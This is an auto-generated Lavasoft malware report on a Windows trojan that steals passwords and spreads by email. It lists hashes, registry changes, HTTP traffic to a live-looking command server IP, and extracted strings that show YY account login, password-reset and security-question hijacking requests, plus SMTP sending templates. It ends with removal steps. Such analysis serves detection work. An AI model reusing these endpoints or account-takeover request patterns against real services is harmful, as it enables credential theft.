Trojan.GenericKD.3222113_b0e76e5fa2

by malwarelabrobot on June 6th, 2016 in Malware Descriptions.

Trojan.GenericKD.3222113 (B) (Emsisoft), Trojan.GenericKD.3222113 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: b0e76e5fa28e60f5494725558e503e6e
SHA1: 35843cb8a70d28d2b52b02e1c3648eec90fb2a9b
SHA256: 2a011c15433155a87df5df7a2331bc659cbd3c251ed531c31a213cdbc56d005b
SSDeep: 24576:O8mMKiqIH4RqU3S3pWaYm0ms5M6WrU5QAnCKNpmAOYYbwmxQ7E:WicRqU3SZd90bm43CY96TOg
Size: 1736704 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-11-26 08:28:36
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour    Description
EmailWorm    Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1552

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
__DDrawCheckExclMode__
__DDrawExclMode__
DDrawWindowListMutex
DDrawDriverObjectListMutex
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)

Registry activity

The process %original file name%.exe:1552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1322288916"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 50 C3 6D C5 74 EF 08 F7 30 7F 7C 57 01 CC C6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

The Trojan modifies the IE security-zone settings so that all local web-nodes without dots in their names that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies the IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????
Product Name: ??YY?????????
Product Version: 4.0.0.0
Legal Copyright: ???????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.0.0.0
File Description: ??QQ:1261278285
Comments: ??QQ:1261278285
Language: English (United States)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             1206370       1208320   5.09774  efb072a618776273fcd58af23797b3b6
.rdata  1212416          396518        397312    4.45323  c5e0607ecb3791bcc31d60712294ac8a
.data   1609728          388427        94208     4.41003  469763cfdc25c6703795a4c2c51d5940
.rsrc   1998848          29656         32768     3.56209  810facead66414b2db86b0f96e8bdfd2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://124.232.163.136/wanda/api.php
hxxp://124.232.163.136/wanda/api.php?WebShieldDRSessionVerify=eYMnR7JeA74b317eN6jy


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /wanda/api.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hXXp://124.232.163.136/wanda/api.php
Accept-Language: en-us
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 124.232.163.136
Cache-Control: no-cache


HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.5.13
X-Powered-By: ASP.NET
Date: Sun, 05 Jun 2016 20:04:47 GMT
Content-Length: 25
No input file specified......


GET /wanda/api.php?WebShieldDRSessionVerify=eYMnR7JeA74b317eN6jy HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hXXp://124.232.163.136/wanda/api.php
Accept-Language: en-us
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 124.232.163.136
Cache-Control: no-cache


HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /wanda/api.php
Content-Length: 0
Connection: Close
Content-Type: text/html


POST /wanda/api.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: hXXp://124.232.163.136/wanda/api.php
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: 124.232.163.136
Cache-Control: no-cache

action=q_s&sid=8
HTTP/1.1 302 Found
Server: Safedog/4.0.0
Location: /wanda/api.php?WebShieldDRSessionVerify=eYMnR7JeA74b317eN6jy
Content-Length: 0
Connection: Close
Content-Type: text/html


The Trojan connects to the servers at the following location(s):

%original file name%.exe_1552:

.text
.rdata
@.data
.rsrc
t%SVh
t$(SSh
|$D.tm
~%UVW
t.It It
u$SShe
ole32.dll
wininet.dll
WanDaVC.dll
kernel32.dll
gdiplus.dll
user32.dll
WinINet.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetVcodeFromURL
GdiplusShutdown
EnumWindows
GetWindowsDirectoryA
HttpAddRequestHeadersA
{A068799B-7551-46b9-8CA8-EEF8357AFEA4}
*.txt
(*.*)|*.*
1261278285
z>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
hXXp://
\TEMP.TMP
\config.ini
Atexe
baIK&.com/login.do
hXXps://udb.
&password=
url=&username=
.com/welcome.do
The URL has moved
.com/ajax.do
action=checkLoginFreqIp&ajax=true&whichOpra=设置密保问题action=password&ajax=true&whichOpra=设置密保问题&currpswd=
.com/security/authorization.do?ajax=true
action=password&ajax=true&whichOpra=设置密保问题&currpswd=
.com/security/question.do?action=questionB&ajax=true
.com/logout.do
hXXps://
.com/verify/login.do
hXXps://udb.yy.com/security/authorization.do?ajax=true
action=password&currpswd=
hXXps://udb.yy.com/account2/resetQuestion4_2_2.do
.com/account2/resetQuestion3_2_1.do
.com/account2/resetQuestion3_2_2.do
hXXp://udb.
.com/account2/resetQuestion4_2_2.do
action=checkLoginFreqIp&ajax=true&whichOpra=修改密保问题
action=question&ajax=true&whichOpra=修改密保问题&answer=
action=checkLoginFreqIp&ajax=true&whichOpra=设置密保邮箱
action=question&ajax=true&whichOpra=设置密保邮箱&answer=
action=password&ajax=true&whichOpra=设置密保邮箱&currpswd=
.com/security/email.do?action=emailB&email=
.com/security/email.do
hXXps://udb.yy.com/account/email4_0_2.do?ajax=true&resetId=
.com/account/email2.do
.com/account2/email3_1_1.do
.com/account/email3_1_3.do?ajax=true
yy.com
.com/password.do
.com/password.do?ajax=true
&password=&newpassword=
hXXps://udb.yy.com/account2/emailFast1_1.do?ajax=true
duowan.com
.com/account/forgetPassword2.do
.com/ajax.do?action=checkSecurityCode&ajax=true&securityCode1=
.com/account/forgetPassword2_checkUser4ToModifyPwdWithAuthToken.do?Ajax=true
.com/account/forgetPassword2_toModifyPwdWithAuthToken.do
.com/security/authorization.do?ajax=true&auth_no_login_user=
.com/account/forgetPassword2_modifyPwdWithAuthToken.do
&newpassword=
Account.passwordQuestion2.init('success')
hXXps://udb.yy.com/login.jsp
&url=http://VVV.yy.com
&passwd=
hXXps://udb.yy.com/security/index.do
hXXps://udb.yy.com/verify/register.do?1315474843062
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
**.dU
hXXp://shop62281233.taobao.com/
hXXp://124.232.163.136/wanda/api.php
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
VVV.3600gz.cn
hXXp://124.232.163.136/wanda/exe/
action=login&u=
hXXp://VVV.ip138.com/ip2city.asp
hXXp://checkip.dyndns.org/
hXXp://whois.ipcn.org/
hXXp://ip.chinaz.com/
0.0.0.0
LoginID
LoginPW
hXXp://wpa.qq.com/msgrd?V=1&Uin=
@qq.com
[email protected]
smtp.126.com
.exe.tmp
Del Temp.zip
\Temp.zip
5update.bat
(@\info.ini
[email protected]
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
{EE09B103-97E0-11CF-978F-00A02463E06F}
Keys
@VBScript.RegExp
hXXp://bc.3600gz.cno
Adobe Photoshop CS2 Windows
2010:10:21 00:30:36
~?k}%C
urlTEXT
MsgeTEXT
"!& 7/&)4)!"0A149;>>>%.DIC<H7=>;
2010:11:24 10:10:55
9Z).aY
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
GetProcessHeap
WinExec
GetKeyState
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
oledlg.dll
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
glViewport
glTexEnvfv
glTexEnvf
\glu32.dll
\Opengl32.dll
glPassThrough
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
HELO %s
SMTP
AUTH LOGIN
LOGIN
AUTH=LOGIN
EHLO %s
Content-Type: application/octet-stream; name=%s
Content-Disposition: attachment; filename=%s
MAIL FROM:<%s>
RCPT TO:<%s>
x86 Family %s Model %s Stepping %s
X-X-X-X
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.0
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
1.1.3
(*.htm;*.html)|*.htm;*.html
;3 #>6.&
'2, / 0&7!4-)1#
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
right-curly-bracket
left-curly-bracket
.232.163.136
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
0246813579
1, 0, 6, 6
- Skin.dll
(*.*)
4.0.0.0

%original file name%.exe_1552_rwx_00401000_00127000:

t%SVh
t$(SSh
|$D.tm
~%UVW
t.It It
u$SShe

%original file name%.exe_1552_rwx_10028000_00015000:

msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
